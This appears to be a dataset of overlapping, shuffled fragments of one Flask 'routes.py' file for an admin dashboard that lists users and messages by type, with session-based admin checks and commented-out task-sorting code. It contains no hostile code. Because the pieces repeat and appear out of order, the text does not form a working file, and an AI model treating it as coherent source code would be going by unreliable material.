"title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def",
"\"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask,",
"from msg_routes import * from user_routes import * #needs to be above all",
"msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users",
"current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs",
"use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\"",
"= User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def",
"from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData,",
"msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs",
"users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required",
"@admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users,",
"be above all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if",
"return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get",
"all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$",
"from functools import wraps #for some reason I need to also import all",
"import Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy",
"#msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for",
"msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs",
"f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg",
"= db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']):",
"completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda",
"dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs)",
"#-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state ==",
"msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def",
"msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs =",
"task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda",
"@wraps(f) def decorated_function(): if g.user is None or \"user_id\" not in session: return",
"\"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\")",
"current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned",
"return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user",
"def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard():",
"[], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\",",
"= get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def",
"dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) #",
"msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All",
"= sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks:",
"@admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return",
"all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required",
"for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required",
"dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user",
"#if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [],",
"def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"#current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks),",
"reason I need to also import all from each of these. #especially list_routes",
"render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users,",
"msgs=msgs) #current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks =",
"from flask import Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy",
"from each of these. #especially list_routes for find all from list from msg_routes",
"get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [],",
"users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\"",
"@app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\")",
"current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks",
"in tasks: # if task.state == \"current\": # current.append(task) # elif task.state ==",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html')",
"url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column,",
"#--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks =",
"msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs =",
"def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return",
"\"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\")",
"@app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg =",
"or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\"))",
"in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg =",
"@app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for",
"from user_routes import * #needs to be above all functions that use it???",
"all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\")",
"= db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def",
"flask import Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import",
"[], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\",",
"title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return",
"sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy",
"from flask_app import db, app from models import User, Msg import msg_routes, user_routes",
"list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if",
"Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from",
"title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return",
"render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks",
"#x.id)) #for task in tasks: # if task.state == \"current\": # current.append(task) #",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title =",
"for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def",
"return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id)",
"get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs():",
"dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\")",
"User, Msg import msg_routes, user_routes from functools import wraps #for some reason I",
"sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: #",
"find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs =",
"dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\")",
"dashboard_show_msgs(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html',",
"not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], []",
"\"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g, redirect, render_template, request,",
"@admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users,",
"user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user",
"the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get",
"= \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users =",
"render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs",
"not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg",
"SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean )",
"of these. #especially list_routes for find all from list from msg_routes import *",
"#Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\"",
"current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if msg.current ==",
"in msgs: # if msg.current == True: # return msg # return None",
"\"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True)",
"return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs",
"current.append(task) # elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current",
"\"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\")",
"to be above all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function():",
"msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all",
"title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return",
"Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app",
"task in tasks: # if task.state == \"current\": # current.append(task) # elif task.state",
"task.state == \"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task) #",
"return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count()",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title",
"#current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count()",
"from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from",
"Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users =",
"= db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def",
"users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required",
"@app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html',",
"users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required",
"@app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html',",
"tasks: # if task.state == \"current\": # current.append(task) # elif task.state == \"completed\":",
"app from models import User, Msg import msg_routes, user_routes from functools import wraps",
"render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs",
"= Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users",
"title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return",
"#tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id))",
"users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404():",
"above all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user",
"#tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in",
"each of these. #especially list_routes for find all from list from msg_routes import",
"key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if",
"routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g,",
"return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg =",
"= \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users =",
"#get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs)",
"msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index():",
"#Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs,",
"title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users",
"= \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users =",
"coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs",
"dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs)",
"db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\")",
"= db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users,",
"datetime #Libs from flask import Flask, g, redirect, render_template, request, url_for, session, flash",
"import msg_routes, user_routes from functools import wraps #for some reason I need to",
"#x.state==\"completed\", #x.id)) #for task in tasks: # if task.state == \"current\": # current.append(task)",
"def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"msg_routes import * from user_routes import * #needs to be above all functions",
"MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app import db,",
"Msg import msg_routes, user_routes from functools import wraps #for some reason I need",
"flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey,",
"the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def",
"@admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users,",
"the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: #",
"deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:(",
"= get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for",
"if g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type",
"users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required",
"All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g, redirect,",
"= \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users =",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online",
"get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the",
"msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return",
"@admin_login_required def dashboard(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg()",
"redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs =",
"Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g, redirect, render_template,",
"import all from each of these. #especially list_routes for find all from list",
"return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all()",
"elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg():",
"the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs():",
"dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\")",
"# -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import",
"user_routes from functools import wraps #for some reason I need to also import",
"def dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html',",
"render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs",
"flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String,",
"( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_",
"functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None",
"redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def",
"num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages",
"#Modules from flask_app import db, app from models import User, Msg import msg_routes,",
"the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get",
") from sqlalchemy import or_ #Modules from flask_app import db, app from models",
"#for some reason I need to also import all from each of these.",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title",
"#Built-in/Generic import datetime #Libs from flask import Flask, g, redirect, render_template, request, url_for,",
"for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs():",
"#x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state == \"current\":",
"wraps #for some reason I need to also import all from each of",
"users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\"",
"list from msg_routes import * from user_routes import * #needs to be above",
"session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg()",
"db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs)",
"'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs,",
"for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs():",
"db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all()",
"to also import all from each of these. #especially list_routes for find all",
"current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not",
"#filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in",
"g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type !=",
"@app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html',",
"def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session",
"is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\":",
"sqlalchemy import or_ #Modules from flask_app import db, app from models import User,",
"elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current,",
"db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return",
"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg",
"Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from",
